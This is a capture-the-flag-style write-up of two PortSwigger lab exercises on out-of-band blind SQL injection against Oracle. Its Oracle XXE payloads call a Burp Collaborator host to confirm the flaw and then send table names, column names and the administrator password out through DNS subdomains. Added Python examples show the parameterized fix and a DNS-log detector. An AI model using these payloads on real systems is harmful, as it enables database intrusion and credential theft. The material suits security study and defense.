# What is OAST?

In some cases the application is vulnerable to SQL injection, **but does it asynchronously**. The application continues processing the user's request in the original thread and uses another thread to execute the SQL query. As a result, the application's response doesn't depend on whether the *query returns any data*, on whether a *database error occurs*, or on the *time taken* to execute the query => none of the techniques described so far will work.

:::info
In this situation, it is often possible to exploit the blind SQL injection vulnerability by triggering **out-of-band** network interactions to a system that you control.
:::

A variety of network protocols can be used for this purpose, but typically the most effective is DNS. This is because very many production networks allow free egress of DNS queries, since they are essential for the normal operation of production systems.

### PRACTITIONER Lab: Blind SQL injection with out-of-band interaction

The techniques for triggering a DNS query are highly specific to the type of database being used. Here I will use the payloads from the [SQL injection cheat sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet).

![](https://hackmd.io/_uploads/SyhSqCtT3.png)

The above payloads inject a query that causes the database server to perform a DNS lookup to `BURP-COLLABORATOR-SUBDOMAIN`, the domain we created from Burp Collaborator. Then, if Collaborator receives any DNS lookups => **the server is vulnerable to SQL injection, and we can confirm the database type based on the payload that caused the DNS lookup**.

In this lab we will need to use Burp Collaborator.
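To make the asynchronous case above concrete, here is an added example in Python (not from the lab or from PortSwigger) that models the tracking-cookie lookup: an in-memory SQLite table stands in for the Oracle database, the table and column names are invented, and the injected cookie uses the `' || (SELECT … FROM dual) --` shape this writeup uses later. The vulnerable build splices the cookie into the statement and the database errors; the parameterized build treats it as data; in both cases the client gets the same 200, because the query runs on a worker thread.

```python
import sqlite3
import threading

# Constructed stand-in for the lab's TrackingId cookie lookup: an in-memory SQLite
# table plays the Oracle database, and the table/column names are made up.
def make_db():
    conn = sqlite3.connect(":memory:", check_same_thread=False)
    conn.execute("CREATE TABLE TrackedUsers (TrackingId TEXT)")
    conn.execute("INSERT INTO TrackedUsers VALUES ('u5YD3PapBcR4lFDo')")
    return conn

class AsyncTracker:
    """Runs the tracking query on a worker thread, as the lab application does,
    so the HTTP status never reflects the query's rows, errors or duration."""
    def __init__(self, conn, parameterized):
        self.conn, self.parameterized = conn, parameterized
        self.lock = threading.Lock()   # serialise use of the shared connection
        self.db_log, self.workers = [], []   # db_log: what the database actually saw

    def handle_request(self, tracking_id):
        t = threading.Thread(target=self._record_visit, args=(tracking_id,))
        t.start()
        self.workers.append(t)
        return 200                     # sent before the query has even started

    def _record_visit(self, tracking_id):
        if self.parameterized:
            # Fix: the cookie is bound as data; the statement text is constant
            sql, args = "SELECT TrackingId FROM TrackedUsers WHERE TrackingId = ?", (tracking_id,)
        else:
            # Vulnerable: the cookie is spliced into the statement text
            sql, args = "SELECT TrackingId FROM TrackedUsers WHERE TrackingId = '%s'" % tracking_id, ()
        with self.lock:
            try:
                rows = self.conn.execute(sql, args).fetchall()
                self.db_log.append(("ok", sql, len(rows)))
            except sqlite3.Error as e:
                self.db_log.append(("error", sql, str(e)))

    def results(self):
        for t in self.workers:
            t.join()
        return self.db_log

def demo(parameterized):
    """Send a cookie of the shape used in this writeup. SQLite has no DUAL table,
    so the spliced query fails on the vulnerable build, yet the client gets 200 either way."""
    app = AsyncTracker(make_db(), parameterized)
    status = app.handle_request("' || (SELECT 1 FROM dual) -- ")
    return status, app.results()[0][0]
```

Because nothing about the query outcome reaches the response, only the database-side log (or an out-of-band interaction) reveals the difference between the two builds.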
After starting Collaborator, we need to copy the domain:

![](https://hackmd.io/_uploads/r1MlxJ5p3.png)

```
2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com
```

Now we will test each payload to see whether it can trigger a DNS lookup.

**Oracle**

With each payload we need to edit it a little:

- add a single quote `'` to close the TrackingId string
- use string concatenation `||` to add another select statement
- replace `BURP-COLLABORATOR-SUBDOMAIN` with the domain we copied from Burp Collaborator

Payload from cheat sheet:

```sql!
SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual
```

Payload:

```sql!
' || (SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com/"> %remote;]>'),'/l') FROM dual) --
```

![](https://hackmd.io/_uploads/S1VViJc62.png)

After sending it, we need to check the Collaborator server:

![](https://hackmd.io/_uploads/BJlui1qph.png)

=> TrackingId is vulnerable to SQL injection, and the database type is Oracle.

![](https://hackmd.io/_uploads/BJTvTyqph.png)

:::success
**Solved** :+1:
:::

### PRACTITIONER Lab: Blind SQL injection with out-of-band data exfiltration

**1. Confirming the SQL injection vulnerability**

We use the same technique as in the previous lab to confirm the vulnerability and check the database type.

**Oracle**

The cheat-sheet payload is edited in the same way as before: a single quote `'` to close the TrackingId string, `||` to concatenate another select statement, and `BURP-COLLABORATOR-SUBDOMAIN` replaced with the domain copied from Burp Collaborator.

Payload:

```sql!
' || (SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com/"> %remote;]>'),'/l') FROM dual) --
```

![](https://hackmd.io/_uploads/rJ1Uyg963.png)

Result in the Collaborator server:

![](https://hackmd.io/_uploads/BJALye5pn.png)

=> TrackingId is vulnerable to SQL injection, and the database type is Oracle.

**2. Figure out the database type and version :heavy_check_mark:**

**3. Guessing the table name**

An interesting discovery: the DNS lookup also works with a subdomain. Example: here I try to inject a subdomain:

```
abc.2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com
```

![](https://hackmd.io/_uploads/HJiTBe5T2.png)

And we can see the subdomain in the Description tab:

![](https://hackmd.io/_uploads/rJsKIlcT3.png)

So if we SELECT from the database and then concatenate the result with the domain as a subdomain, we can easily read the query result from the Collaborator server :smiley:

Let's check our theory.

Payload from cheat sheet:

```sql!
SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual
```

Payload:

```sql!
'||(SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT 1 FROM dual)||'.2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com/"> %remote;]>'),'/l') FROM dual) --
```

![](https://hackmd.io/_uploads/B1fl9gcT2.png)

Result:

![](https://hackmd.io/_uploads/Hykz9lqan.png)

Bingo :3 Now we can easily examine the database.

Use this payload to check whether there is a table named `USERS`:

```sql!
'||(SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT table_name FROM all_tables WHERE table_name='USERS')||'.2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com/"> %remote;]>'),'/l') FROM dual) --
```

Result:

![](https://hackmd.io/_uploads/BydKsgq62.png)

**4. Guessing the column name**

Use these payloads to check whether the table contains a column `username` and a column `password`.

Payload:

```sql!
'||(SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT column_name FROM all_tab_columns WHERE table_name = 'USERS' AND column_name = 'USERNAME')||'.2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com/"> %remote;]>'),'/l') FROM dual) --
```

Result:

![](https://hackmd.io/_uploads/S1JKpgcp3.png)

Payload:

```sql!
'||(SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT column_name FROM all_tab_columns WHERE table_name = 'USERS' AND column_name = 'PASSWORD')||'.2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com/"> %remote;]>'),'/l') FROM dual) --
```

Result:

![](https://hackmd.io/_uploads/r1_TaxqT3.png)

**5. Guessing the username and password**

Payload:

```sql!
'||(SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT USERNAME FROM USERS WHERE USERNAME = 'administrator')||'.2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com/"> %remote;]>'),'/l') FROM dual) --
```

Result:

![](https://hackmd.io/_uploads/rkL8AlqT2.png)

Payload:

```sql!
'||(SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT PASSWORD FROM USERS WHERE USERNAME = 'administrator')||'.2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com/"> %remote;]>'),'/l') FROM dual) --
```

Result:

![](https://hackmd.io/_uploads/HJeUjRg96h.png)

**6. Login to the admin account**

![](https://hackmd.io/_uploads/S1deJbqph.png)

:::success
**Solved** :+1:
:::
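From the defender's side, the exfiltration channel used in steps 3 to 5 looks like a database host resolving names whose leading label changes on every request. The added example below (not part of the lab or the PortSwigger material) scans constructed BIND-style query-log lines for exactly that pattern; it assumes 10.0.0.5 is the database server, that such hosts should only ever resolve names under `corp.internal`, and it reuses the Collaborator domain from this writeup for the sample entries.

```python
import re
from collections import defaultdict

# Constructed BIND-style query-log lines, not taken from the lab. 10.0.0.5 is
# assumed to be the database server and 10.0.0.9 an ordinary application host;
# the Collaborator domain is the one used in this writeup.
SAMPLE_LOG = """\
client 10.0.0.5#53012: query: ntp.corp.internal IN A +
client 10.0.0.9#40122: query: cdn.example.com IN A +
client 10.0.0.5#53013: query: 2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com IN A +
client 10.0.0.5#53014: query: USERS.2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com IN A +
client 10.0.0.5#53015: query: administrator.2il7stfzp2ypmeb9wrrld6du9lfc3gr5.oastify.com IN A +
"""

LINE_RE = re.compile(r"client (?P<ip>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\w+)")
DB_SERVERS = {"10.0.0.5"}              # hosts that have no business resolving external names
ALLOWED_SUFFIXES = ("corp.internal",)  # the only names a database host may legitimately look up

def common_suffix(names):
    """Longest run of trailing labels shared by every name in the group."""
    shared = []
    for labels in zip(*[n.split(".")[::-1] for n in names]):
        if len(set(labels)) != 1:
            break
        shared.append(labels[0])
    return ".".join(shared[::-1])

def find_exfil_channels(log_text):
    """Flag lookups from a database host to non-allowlisted domains and recover
    the varying leading labels, which is where the query results travel."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m or m["ip"] not in DB_SERVERS:
            continue
        qname = m["qname"].rstrip(".")
        if qname.endswith(ALLOWED_SUFFIXES):
            continue
        groups[(m["ip"], ".".join(qname.split(".")[-2:]))].append(qname)
    alerts = []
    for (ip, base), names in groups.items():
        suffix = common_suffix(names)
        leading = [n[: len(n) - len(suffix)].rstrip(".") for n in names]
        alerts.append({"client": ip, "base_domain": base, "lookups": len(names),
                       "leading_labels": [l for l in leading if l]})
    return alerts
```

The same egress restriction that makes this log useful (database hosts resolving only an allowlist, with everything else alerted on or blocked) also removes the DNS channel the lab relies on.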